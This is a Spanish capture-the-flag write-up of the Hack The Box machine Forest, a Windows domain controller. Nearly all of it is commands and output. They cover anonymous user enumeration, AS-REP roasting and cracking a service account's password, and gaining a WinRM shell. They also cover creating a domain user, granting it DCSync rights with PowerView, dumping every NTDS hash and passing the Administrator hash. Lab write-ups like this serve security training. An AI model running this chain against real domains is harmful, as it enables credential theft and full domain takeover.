Enumeración
Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos varios puertos abiertos entre ellos smb, winrm y otros
❯ nmap 10.10.10.161
Nmap scan report for 10.10.10.161
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49685/tcp open unknown
49701/tcp open unknown
59440/tcp open unknown
Con crackmapexec conseguimos el dominio de la máquina victima, htb.local
❯ crackmapexec smb 10.10.10.161
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Agregamos el domino al /etc/hosts para posibles ataques mas adelante
❯ echo "10.10.10.161 htb.local" | sudo tee -a /etc/hosts
Con rpcclient podemos conectarnos, en este caso permite que nos conectemos sin proporcionar credenciales, asi que enumeramos los usuarios del dominio
❯ rpcclient -N -U '' 10.10.10.161 -c enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Aplicando expresiones regulares podemos obtener una lista de solo los usuarios
❯ rpcclient -N -U '' 10.10.10.161 -c enumdomusers | grep -oP '\[\D*?\]' | tr -d '[]'
Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
Shell - svc-alfresco
Guardamos la lista en un archio users.txt y con GetNPUsers podemos aplicar un ASREPRoast Attack, como resultado obtenemos un hash del usuario svc-alfresco
❯ impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:48c8e22a848540c95009c837dd0dc91d$14a282620980c10b59951a0c5e604886d4b658ba9a8da0e160dee9d6de49945ca06e63b42974d0505023001051d1950a50651a06c47eb2bea13a41721110c1848f92b8e1a0f047b6722cd4fbc0774ca88dbc2ba3a522a9e34e44ce324104645c11081539db41b3727a3de96531e00015febdab4fe478b7a35356dd651b22de4b1271efe02b6a64df6d681475e87d74bcda943c0aa9b5ba56f7f379adbfaa65c9ee3c3bb732297375b6c8f99e3f9a41d023aaceb34c675aa2f72c1e930bbd965128ec78373271bcd0592da03f6d925e1f1c0d3051cbc6dab1e5ab5930d1659b4a56ffabc9699b
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
Guardamos el hash en un archivo llamado hash y con john aplicamos fuerza bruta y obtenemos la contraseña de svc-alfresco en texto plano, que es s3rvice
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Podemos comprobar con crackmapexec que son válidas para smb y listando los recursos no encontramos nada que sea realmente interesante
❯ crackmapexec smb 10.10.10.161 -u svc-alfresco -p s3rvice --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [+] Enumerated shares
SMB 10.10.10.161 445 FOREST Share Permissions Remark
SMB 10.10.10.161 445 FOREST ----- ----------- ------
SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin
SMB 10.10.10.161 445 FOREST C$ Default share
SMB 10.10.10.161 445 FOREST IPC$ Remote IPC
SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share
SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server share
Sin embargo winrm esta abierto y podemos comprobar que tambien son válidas
❯ crackmapexec winrm 10.10.10.161 -u svc-alfresco -p s3rvice
SMB 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
Nos conectamos con evil-winrm, obtenemos una shell y podemos leer la flag
❯ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
PS C:\Users\svc-alfresco\Documents> type ..\Desktop\user.txt
8f9**************************431
PS C:\Users\svc-alfresco\Documents>
Shell - Administrator
Usaremos bloodhound-python para enumerar todos los privilegios del dominio
❯ bloodhound-python -u svc-alfresco -p s3rvice -c All -d htb.local -ns 10.10.10.161 --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 32 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 52S
Subimos la información a Bloodhound y en rutas cortas podemos ver que pertenecemos al grupo Account Operators que tiene privilegios GenericAll sobre Exchange Windows Permissions que a su vez tiene el privilegio WriteDacl sobre el dominio, con el que podemos aplicar un ataque DCSync para Administrator
Iniciamos subiendo el modulo PowerView con la función upload e importandolo
PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
PS C:\Users\svc-alfresco\Documents> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents>
Ya que nuestro usuario pertenece a Account Operators creamos un usuario pwned con a nivel de dominio y lo agregamos al grupo Exchange Windows Permissions
PS C:\Users\svc-alfresco\Documents> net user pwned password123# /add /domain
The command completed successfully.
PS C:\Users\svc-alfresco\Documents> net group 'Exchange Windows Permissions' pwned /add /domain
The command completed successfully.
PS C:\Users\svc-alfresco\Documents>
Definimos las credenciales de pwned y con Add-DomainObjectAcl le otorgamos el permiso para hacer un DCSync para poder obtener los hashes del ntds.dit
PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'password123#' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\pwned', $SecPassword)
PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'htb.local\Domain Admins' -PrincipalIdentity pwned -Rights DCSync
PS C:\Users\svc-alfresco\Documents>
Usando crackmapexec con las credenciales del usuario pwned podemos dumpear todos los hashes del ntds.dit entre ellos el hash del usuario Administrator
❯ crackmapexec smb 10.10.10.161 -u pwned -p password123# --ntds drsuapi
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\pwned:password123#
SMB 10.10.10.161 445 FOREST [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.161 445 FOREST [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.161 445 FOREST htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
SMB 10.10.10.161 445 FOREST Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
SMB 10.10.10.161 445 FOREST DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
SMB 10.10.10.161 445 FOREST htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
SMB 10.10.10.161 445 FOREST htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
SMB 10.10.10.161 445 FOREST htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
SMB 10.10.10.161 445 FOREST htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
SMB 10.10.10.161 445 FOREST htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
SMB 10.10.10.161 445 FOREST htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
SMB 10.10.10.161 445 FOREST pwned:9602:aad3b435b51404eeaad3b435b51404ee:e5abfbc0410c5ce37bae2276dee52aaf:::
SMB 10.10.10.161 445 FOREST FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:0a5bb0c2d2dada829b5c37f4bf908373:::
SMB 10.10.10.161 445 FOREST EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
Podemos hacer un passthehash proporcionando solo el hash NT de Administrator para conectarnos con evil-winrm y obtener una shell además de la flag
❯ evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
PS C:\Users\Administrator\Documents> whoami
htb\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
aa8**************************cc6
PS C:\Users\Administrator\Documents>
